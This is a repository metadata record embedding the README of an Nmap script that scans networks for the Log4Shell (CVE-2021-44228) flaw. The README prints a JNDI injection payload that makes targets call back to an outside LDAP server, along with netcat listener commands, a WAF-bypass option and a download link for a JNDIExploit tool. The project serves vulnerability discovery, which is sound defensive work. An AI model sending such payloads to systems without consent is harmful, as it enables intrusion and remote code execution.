{"id":22579764,"url":"https://github.com/giterlizzi/nmap-log4shell","last_synced_at":"2025-08-23T22:08:22.688Z","repository":{"id":148320721,"uuid":"438012376","full_name":"giterlizzi/nmap-log4shell","owner":"giterlizzi","description":"Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)","archived":false,"fork":false,"pushed_at":"2021-12-17T17:23:57.000Z","size":24,"stargazers_count":79,"open_issues_count":2,"forks_count":21,"subscribers_count":5,"default_branch":"main","last_synced_at":"2025-03-24T16:02:58.814Z","etag":null,"topics":["cve-2021-44228","log4j","log4shell","nmap","nmap-scripts","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Lua","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/giterlizzi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-13T20:17:14.000Z","updated_at":"2024-12-04T01:38:34.000Z","dependencies_parsed_at":"2023-05-19T18:30:35.444Z","dependency_job_id":null,"html_url":"https://github.com/giterlizzi/nmap-log4shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/giterlizzi","download_url":"https://codeload.github.com/giterlizzi/nmap-log4shell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248270569,"owners_count":21075795,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-44228","log4j","log4shell","nmap","nmap-scripts","vulnerability"],"created_at":"2024-12-08T05:12:10.937Z","updated_at":"2025-04-10T18:22:45.583Z","avatar_url":"https://github.com/giterlizzi.png","language":"Lua","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)\n\n`nmap-log4shell` is a NSE script for discovery Apache Log4j RCE ([CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)) vulnerability across the network. The script is able to inject the **log4shell** exploit payload via HTTP Headers (default) or via TCP/UDP socket.\n\n## Vulnerability\n\n**CVE-2021-44228** is a remote code execution (RCE) vulnerability in Apache Log4j 2. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:\n\n-  Lightweight Directory Access Protocol (LDAP)\n-  Secure LDAP (LDAPS)\n-  Remote Method Invocation (RMI)\n-  Domain Name Service (DNS)\n\nIf the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server. Successful exploitation could lead to RCE.\n\n\n## Installation\n\nLocate where your nmap scripts are located on your system:\n\n- for *nix system it might be `~/.nmap/scripts/` or `$NMAPDIR`\n- for Mac it might be `/usr/local/Cellar/nmap/\u003cversion\u003e/share/nmap/scripts/`\n- for Windows it might be `C:\\Program Files (x86)\\Nmap\\scripts`\n\nCopy the provided script (log4shell.nse) into that directory run `nmap --script-updatedb` to update the nmap script DB.\n\n\n## Usage\n\n    nmap --script log4shell.nse --script-args log4shell.callback-server=172.17.42.1:1389 -p 8080 172.17.42.2 \n    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 21:26 CET\n    Nmap scan report for 172.17.42.1\n    Host is up (0.000096s latency).\n\n    PORT     STATE SERVICE\n    8080/tcp open  http-proxy\n    | log4shell: \n    |   Payloads:\n    |     ${jndi:ldap:/172.17.42.1:389/log4shell}\n    |   Test Method: HTTP\n    |   URL Path: /\n    |   HTTP Method: GET\n    |   HTTP Headers: \n    |     Access-Control-Request-Method: 200 \n    |     Accept: 200 \n    |     Access-Control-Request-Headers: 200 \n    |     Accept-Charset: 200 \n    |     X-Api-Version: 200 \n    |     Warning: 200 \n    |     Pragma: 200 \n    |     Upgrade-Insecure-Requests: 200 \n    |     Range,: 400 \n    |     Hostname: 200 \n    |     Content-Length: 400 \n    |     Dnt: 200 \n    |     Date: 200 \n    |     Username: 200 \n    |     Content-Encoding: 200 \n    |     Content-Type: 200 \n    |     Forwarded: 200 \n    |     Max-Forwards: 200 \n    |     Accept-Encoding: 200 \n    |     Referer: 200 \n    |     IP: 200 \n    |     IPaddress: 200 \n    |     X-Amz-Date: 200 \n    |     X-Amz-Target: 200 \n    |     TE: 200 \n    |     Content-Disposition: 200 \n    |     X-Requested-With: 200 \n    |     upgrade-insecure-requests: 200 \n    |     Authorization: 200 \n    |     Cookie: 200 \n    |     User-Agent: 200 \n    |     Accept-Language: 200 \n    |     Proxy-Authorization: 200 \n    |     Expect: 417 \n    |     From: 200 \n    |     Accept-Datetime: 200 \n    |     X-CSRF-Token: 200 \n    |     Origin: 200 \n    |_  Note: (!) Inspect the callback server (172.17.42.1:389) or web-application (172.17.42.2:8080) logs\n\n\n### Arguments\n\n- `log4shell.callback-server`: The callback server (eg. `172.17.42.1:1389`)\n- `log4shell.http-headers`: Comma-separated list of HTTP headers (eg. `X-Api-Version,User-Agent,Referer`)\n- `log4shell.http-method`: HTTP method (default: `GET`)\n- `log4shell.url-path`: URL path (default: `/`)\n- `log4shell.waf-bypass`: Use WAF bypass payloads (default: `false`)\n- `log4shell.test-method`: Test through `http` (default), `tcp`, `udp` or `all`\n\n\n### Callback Server\n\nThe script relies on callbacks from the target being scanned and hence any firewall rules or interaction with other security devices will affect the efficacy of the script.\n\n\n#### Netcat or Ncat\n\nListen a TCP port with netcat (or ncat):\n\n    ncat -vkl 1389   # Ncat\n    nc -lvnp 1389    # Netcat\n\nRun Nmap with --script log4shell.nse script\n\n    nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p \u003cport\u003e] \u003ctarget\u003e\n\nSee the target IP address in netcat (or ncat) output:\n\n    Ncat: Connection from 172.17.0.2.\n    Ncat: Connection from 172.17.0.2:38898.\n\n#### JNDIExploit\n\nDownload JNDIExploit from GitHub (https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip)\n\nStart JNDIExploit server:\n\n    java -jar JNDIExploit.jar\n\nRun Nmap with --script log4shell.nse script\n\n    nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p \u003cport\u003e] \u003ctarget\u003e\n\nSee JNDIExploit output for see the received LDAP query\n\n    [+] Received LDAP Query: log4shell\n    [!] Invalid LDAP Query: log4shell\n\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of nmap-log4shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n\n# License\n\nThe project is licensed under MIT License.\n\n\n# Author\n\n- Giuseppe Di Terlizzi (giterlizzi)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgiterlizzi%2Fnmap-log4shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgiterlizzi%2Fnmap-log4shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgiterlizzi%2Fnmap-log4shell/lists"}